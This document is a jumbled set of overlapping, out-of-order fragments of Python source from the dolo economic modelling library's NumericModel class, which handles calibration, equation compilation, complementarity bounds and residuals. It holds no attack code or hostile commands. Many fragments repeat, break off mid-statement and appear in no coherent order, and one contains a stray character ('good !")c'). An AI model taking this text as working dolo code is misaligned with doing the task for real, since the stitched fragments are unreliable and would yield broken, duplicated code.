calibration_to_vector", "control: msg = \"Complementarity condition '{}' incorrect. Expected {} instead of {}.\".format(comp, control,", "condition '{}' incorrect. Expected {} instead of {}.\".format(comp, control, res[1]) raise Exception(msg) return", "except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return v", "args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue calib", "right-hand side # TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1]", "if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type", "def filter_equal(eq): if '=' in eq: lhs, rhs = str.split(eq,'=') eq = '{}", "all equations as rhs - lhs def filter_equal(eq): if '=' in eq: lhs,", "t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname,", "u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val) <", "None else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] #", "from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib)", "markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list): return [ self.get_calibration(p) for p", "self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is None: self.markov_chain =", "markov_chain = discrete_transition if markov_chain is None: self.markov_chain = None else: self.markov_chain =", "- lhs def filter_equal(eq): if '=' in eq: lhs, rhs = str.split(eq,'=') eq", "[filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag", "symbols = self.symbols # should match self.symbols comps = [] functions = {}", "eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names = 
['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname),", "= self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def residuals(self, calib=None): if self.model_type", "import compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works for fg", "\"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition", "else {} self.infos = infos if infos is not None else {} self.infos['data_layout']", "restore recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs]", "None - \"a<=expr\" where a is a controls - \"expr<=a\" where a is", "eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\"", "\"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res =", "eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf',", "{vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s += ss # import", "recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names: if ag[0] == 'auxiliaries': t", "name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res", "i, eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8: val =", "ddefs = OrderedDict() for ag in comp_args: if ag[0] == 'auxiliaries': t =", "infos is not None else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type", "str.strip(eq) return eq else: return eq eqs = [filter_equal(eq) for eq in eqs]", ".symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options)", "= StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe =", "!\")c n_output = len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname]", "control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names", "= discrete_transition if markov_chain is None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab,", "else: # else ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def", "calibration_dict = None covariances = None markov_chain = None def __init__(self, symbolic_model, options=None,", "= 'out' else: target_spec = None if spec.get('complementarities'): # TODO: Rewrite and simplify", "elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p in pname ] )", "'- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__()", "calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options", "x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb,", "import residuals return residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import 
residuals", "in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't contain equations of type", "- \"a<=expr\" where a is a controls - \"expr<=a\" where a is a", "# target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec = None else: target_spec[2]", ") from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols,", "standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]]", "original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] =", "# read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition)", "import pprint # s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return", ") original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound", "pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname", "= compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output", "NumericModel: calibration = None calibration_dict = None covariances = None markov_chain = None", "= ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in", "expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib is None: calib =", "not spec.get('optional'): raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname)) else: continue", "simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps = []", "ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor", "# updates calibration according to the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver", "type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals() #", "def __update_from_symbolic__(self): import numpy # updates calibration according to the symbolic definitions system", "len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames) group = [g for g", "calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s =", "residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib)", "return s def __repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions:", "= recipe['specs'][funname] if funname not in self.symbolic.equations: if not 
spec.get('optional'): raise Exception(\"The model", "= gu_upper_bound # rewrite all equations as rhs - lhs def filter_equal(eq): if", "- None - \"a<=expr\" where a is a controls - \"expr<=a\" where a", "self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for", "self.infos = infos if infos is not None else {} self.infos['data_layout'] = 'columns'", "self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val = res[eqgroup][i]", "calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast", "= numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is None: self.markov_chain = None", "raise exception if unknown symbol ? if len(args)==2: pname, pvalue = args if", "'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type == 'dtmscc': from", "= self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): # raise", "in enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8: val = 0 vals", "if infos is not None else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name']", "ss += \"\\n\" s += ss # import pprint # s += '-", "symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs)", "dd recipe = recipes[model_type] symbols = self.symbols # should match self.symbols comps =", "= timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v", "def residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self,", "dolo.compiler.recipes import recipes from numba import njit class NumericModel: calibration = None calibration_dict", "and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored", "in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if", "return [ self.get_calibration(p) for p in pname ] elif isinstance(pname, tuple): return tuple(", "return self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub", "k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe", "continue if spec.get('target'): # keep only right-hand side # TODO: restore recursive definitions", "None else: target_spec[2] = 'out' else: target_spec = None if spec.get('complementarities'): # TODO:", "def get_calibration(self, pname, *args): if isinstance(pname, list): return [ self.get_calibration(p) for p in", "is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast", "for r in res] if res[1] != control: msg = \"Complementarity condition '{}'", "= evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None: 
self.covariances = None else:", "from numba import njit class NumericModel: calibration = None calibration_dict = None covariances", "evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None: self.covariances =", "original_functions = {} original_gufunctions = {} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname]", "in self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options = options if options", "( {} )'.format(rhs, lhs) eq = str.strip(eq) return eq else: return eq eqs", "self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration according to the symbolic", "group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return", "= '\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for", "auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse(", "n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound", "is not None else {} self.infos = infos if infos is not None", "from .codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes", "self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration according to the", "import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval", "for i, eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8: val", "+= '_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for", "u''' Model object: ------------ - name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos)", "rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs,", "to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols = self.symbols # should match", "= OrderedDict() for ag in arg_names: if ag[0] == 'auxiliaries': t = ag[1]", "= ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables,", "= None if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order", "= standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound", "r in res] if res[1] != control: msg = \"Complementarity condition '{}' incorrect.", "fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def", "= [g for g in self.symbols.keys() if pname in self.symbols[g]] try: group =", "\"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist in", "= ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args: if ag[0] ==", "if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) 
ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs,", "calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s = u''' Model object:", "original_gufunctions self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): '''", ") functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]]", "symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in self.symbols.items() if", ") # print(\"So far so good !\")c n_output = len(eqs) original_functions[funname] = fun", "self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__()", "gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as rhs - lhs def", "else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is None: self.markov_chain", "= functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp", "numpy # updates calibration according to the symbolic definitions system = self.symbolic.calibration_dict from", "s = u''' Model object: ------------ - name: \"{name}\" - type: \"{type}\" -", "eval_formula if calib is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def", "ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time)", "time) k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)]", "if spec.get('recursive') is False: target_spec = None else: target_spec[2] = 'out' else: target_spec", "None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if", ": {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s += ss #", "output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so good !\")c n_output = len(eqs)", "'_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time", "{}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self, *args, **kwargs):", "recipe = recipes[model_type] symbols = self.symbols # should match self.symbols comps = []", "\"a<=expr\" where a is a controls - \"expr<=a\" where a is a control", "__compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions #", "= self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val =", "= OrderedDict() for ag in comp_args: if ag[0] == 'auxiliaries': t = ag[1]", "lhs, rhs = str.split(eq,'=') eq = '{} - ( {} )'.format(rhs, lhs) eq", "upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound,", "definitions eqs = 
self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs] eqs =", "else: return None def residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import", "[g for g in self.symbols.keys() if pname in self.symbols[g]] try: group = group[0]", "self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options = options if options is", "if options is not None else {} self.infos = infos if infos is", "[fun_lb, fun_ub] else: return None def residuals(self, calib=None): if self.model_type == 'dtcscc': from", "if k not in ('parameters','shocks','values')], ()) self.options = options if options is not", "self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__()", "for ag in arg_names: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs)", "so good !\")c n_output = len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output", "from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options =", "infos if infos is not None else {} self.infos['data_layout'] = 'columns' self.name =", "if markov_chain is None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for", "control): ''' # comp can be either: - None - \"a<=expr\" where a", "original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions", "'|' in eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs =", "n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ =", "ss # import pprint # s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2,", "eq in eqs] eqs = [str.strip(eq) for eq in eqs] target_spec = spec.get('target')", "self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' #", "res] if res[1] != control: msg = \"Complementarity condition '{}' incorrect. Expected {}", "group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v =", "= self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy", ") original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions", "self.symbols comps = [] functions = {} original_functions = {} original_gufunctions = {}", "= compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output )", "target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is", ").body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k =", "msg = \"Complementarity condition '{}' incorrect. 
Expected {} instead of {}.\".format(comp, control, res[1])", "{eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s += ss # import pprint #", "= calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator =", "if abs(val) < 1e-8: val = 0 vals = '{:.4f}'.format(val) if abs(val) >", "ag in comp_args: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound,", "= [filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for", "self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in self.symbols.items() if k", "self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import", "'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self):", "in ('parameters','shocks','values')], ()) self.options = options if options is not None else {}", "self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s = u''' Model object: ------------", "'\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup", "target_spec = None else: target_spec[2] = 'out' else: target_spec = None if spec.get('complementarities'):", "- name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n'", "return None def residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals", "from dolo.compiler.eval_formula import eval_formula if calib is None: calib = self.calibration return eval_formula(expr,", "and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps =", "= ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs,", "from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works for fg models only", "ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) #", "= OrderedDict() for eq in auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse(", "residuals return residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return", "system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration =", "if len(args)==2: pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else", "dolo.compiler.eval_formula import eval_formula if calib is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe,", "structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution", "from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self, expr, 
dataframe=None, calib=None): from", "side # TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for", "*args, **kwargs): # raise exception if unknown symbol ? if len(args)==2: pname, pvalue", "= compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so good", "()) self.options = options if options is not None else {} self.infos =", "= '{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals, 'red') # eq =", "spec.get('target')[2] if spec.get('recursive') is False: target_spec = None else: target_spec[2] = 'out' else:", "re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can be either: - None -", "isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p in pname ] ) elif", "self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None", "else: target_spec = None if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec =", "val = 0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals,", "res = [r.strip() for r in res] if res[1] != control: msg =", "= colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} :", "= '{} - ( {} )'.format(rhs, lhs) eq = str.strip(eq) return eq else:", "# works for fg models only model_type = self.model_type if 'auxiliaries' not in", "import recipes from numba import njit class NumericModel: calibration = None calibration_dict =", "] ) elif len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames) group =", "'auxiliaries' not in self.symbols: model_type += '_' else: # prepare auxiliaries auxeqs =", "i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i] eq, comp =", "= u''' Model object: ------------ - name: \"{name}\" - type: \"{type}\" - file:", "'{}'.\".format(funname)) else: continue if spec.get('target'): # keep only right-hand side # TODO: restore", "= lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite", "@property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub']", "len(args)==2: pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore", "dd = OrderedDict() for eq in auxeqs: lhs, rhs = eq.split('=') lhs =", "if pname in self.symbols[g]] try: group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname))", "for ag in comp_args: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs)", "None def residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return", "+ args return self.get_calibration(pnames) group = [g for g in self.symbols.keys() if pname", "if isinstance(pname, list): return [ self.get_calibration(p) for p in pname ] elif isinstance(pname,", "if unknown symbol ? 
if len(args)==2: pname, pvalue = args if isinstance(pname, str):", "'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs)", "self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if", "= options if options is not None else {} self.infos = infos if", "elif len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames) group = [g for", "self.symbols: model_type += '_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs =", "read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances", "self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] =", "u\"\\u27C2\") ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss +=", "eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq", "def x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return", "timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import njit class NumericModel: calibration", "options if options is not None else {} self.infos = infos if infos", "return eq else: return eq eqs = [filter_equal(eq) for eq in eqs] arg_names", "= [r.strip() for r in res] if res[1] != control: msg = \"Complementarity", "dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from", "self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type ==", "= symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in self.symbols.items() if k not", "compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works for fg models", "ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs,", "distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None:", "s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self):", "['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args: if ag[0] == 'auxiliaries':", "len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec = None else:", "= str.strip(eq) return eq else: return eq eqs = [filter_equal(eq) for eq in", "only right-hand side # TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs =", "file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals() # for 
